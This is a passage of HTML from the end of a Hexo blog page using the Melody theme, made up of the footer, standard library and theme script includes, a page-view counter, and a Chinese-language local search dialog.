class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.1"></script><script src="/js/fancybox.js?version=1.9.1"></script><script src="/js/sidebar.js?version=1.9.1"></script><script src="/js/copy.js?version=1.9.1"></script><script src="/js/fireworks.js?version=1.9.1"></script><script src="/js/transition.js?version=1.9.1"></script><script src="/js/scroll.js?version=1.9.1"></script><script src="/js/head.js?version=1.9.1"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>